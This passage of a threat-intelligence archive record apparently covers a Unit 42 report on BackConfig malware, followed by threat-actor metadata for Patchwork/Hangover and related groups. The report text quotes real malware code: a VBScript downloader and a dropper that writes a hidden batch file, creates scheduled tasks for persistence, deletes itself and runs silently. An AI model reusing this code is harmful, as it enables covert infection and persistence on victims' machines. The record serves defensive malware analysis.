objXMLHTTP.ResponseBody\r\nobjADOStream.Position = 0\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nIf objFSO.Fileexists(strPath) Then WScript.Quit()\r\nSet objFSO = Nothing\r\nobjADOStream.SaveToFile strPath\r\nobjADOStream.Close\r\nSet objADOStream = Nothing\r\nEnd if\r\nSet objXMLHTTP = Nothing\r\n“Setup” BAT component\r\n[Audio.txt -\u003e Audio.bat CODE]\r\nSet oFile = fso.CreateTextFile(\"c:\\Drivers\\Audio.txt\")\r\noFile.WriteLine (\"echo off\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\pdf\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\dwg\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Daily\\Backup\\Files\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Adobe\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Daily\")\r\noFile.WriteLine (\"attrib +a +h +s C:\\Drivers\")\r\noFile.WriteLine (\"del /f %USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"del /f %USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\")\r\noFile.WriteLine (\"SET /A %COMPUTERNAME%\")\r\noFile.WriteLine (\"SET /A RAND=%RANDOM% 10000 + 1\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% \u003e\u003e %USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% \u003e\u003e %USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\")\r\noFile.WriteLine (\"schtasks /delete /tn Winmgt_log /f\")\r\noFile.WriteLine 
(\"schtasks /delete /tn Yahoo_Drive /f\")\r\noFile.WriteLine (\"schtasks /create /sc minute /mo 10 /f /tn Winmgt_log /tr C:\\Drivers\\dphc.exe\")\r\noFile.WriteLine (\"schtasks /create /sc minute /mo 20 /f /tn Yahoo_Drive /tr C:\\Drivers\\Drive.vbs\")\r\noFile.WriteLine (\"ren C:\\Drivers\\Drive.txt Drive.vbs \")\r\noFile.WriteLine (\"del %0\")\r\noFile.Close\r\nSet fso = Nothing\r\nSet oFile = Nothing\r\nDim OldName, NewName\r\nGivenLocation = \"C:\\Drivers\\\"\r\nOldName = \"Audio.txt\"\r\nNewName = \"Audio.bat\"\r\nOn Error Resume Next\r\nName GivenLocation \u0026 OldName As GivenLocation \u0026 NewName\r\nDim RetVal\r\nRetVal = Shell(\"C:\\Drivers\\Audio.bat\", vbHide)\r\nSource: https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/"
	],
	"report_names": [
		"updated-backconfig-malware-targeting-government-and-military-organizations"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ca292585-950c-400f-b632-c19fa3491fe1",
			"created_at": "2022-10-25T15:50:23.599765Z",
			"updated_at": "2026-04-10T02:00:05.417659Z",
			"deleted_at": null,
			"main_name": "MONSOON",
			"aliases": null,
			"source_name": "MITRE:MONSOON",
			"tools": [
				"TINYTYPHON",
				"BADNEWS",
				"Unknown Logger",
				"AutoIt backdoor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "88854a9f-641a-4412-89db-449b4d5cbc51",
			"created_at": "2022-10-25T16:07:23.963599Z",
			"updated_at": "2026-04-10T02:00:04.810023Z",
			"deleted_at": null,
			"main_name": "Operation HangOver",
			"aliases": [
				"G0042",
				"Monsoon",
				"Operation HangOver",
				"Viceroy Tiger"
			],
			"source_name": "ETDA:Operation HangOver",
			"tools": [
				"AutoIt backdoor",
				"BADNEWS",
				"BackConfig",
				"JakyllHyde",
				"TINYTYPHON",
				"Unknown Logger",
				"WSCSPL"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c81067e0-9dcb-4e3f-abb0-80126519c5b6",
			"created_at": "2022-10-25T15:50:23.285448Z",
			"updated_at": "2026-04-10T02:00:05.282202Z",
			"deleted_at": null,
			"main_name": "Patchwork",
			"aliases": [
				"Hangover Group",
				"Dropping Elephant",
				"Chinastrats",
				"Operation Hangover"
			],
			"source_name": "MITRE:Patchwork",
			"tools": [
				"NDiskMonitor",
				"QuasarRAT",
				"BackConfig",
				"TINYTYPHON",
				"AutoIt backdoor",
				"PowerSploit",
				"BADNEWS",
				"Unknown Logger"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cfdd350b-de30-4d29-bbee-28159f26c8c2",
			"created_at": "2023-01-06T13:46:38.433736Z",
			"updated_at": "2026-04-10T02:00:02.972971Z",
			"deleted_at": null,
			"main_name": "VICEROY TIGER",
			"aliases": [
				"OPERATION HANGOVER",
				"Donot Team",
				"APT-C-35",
				"SectorE02",
				"Orange Kala"
			],
			"source_name": "MISPGALAXY:VICEROY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434278,
	"ts_updated_at": 1775791983,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d39ee9fb22106b3f9da17e504c910b97f200bbd5.pdf",
		"text": "https://archive.orkl.eu/d39ee9fb22106b3f9da17e504c910b97f200bbd5.txt",
		"img": "https://archive.orkl.eu/d39ee9fb22106b3f9da17e504c910b97f200bbd5.jpg"
	}
}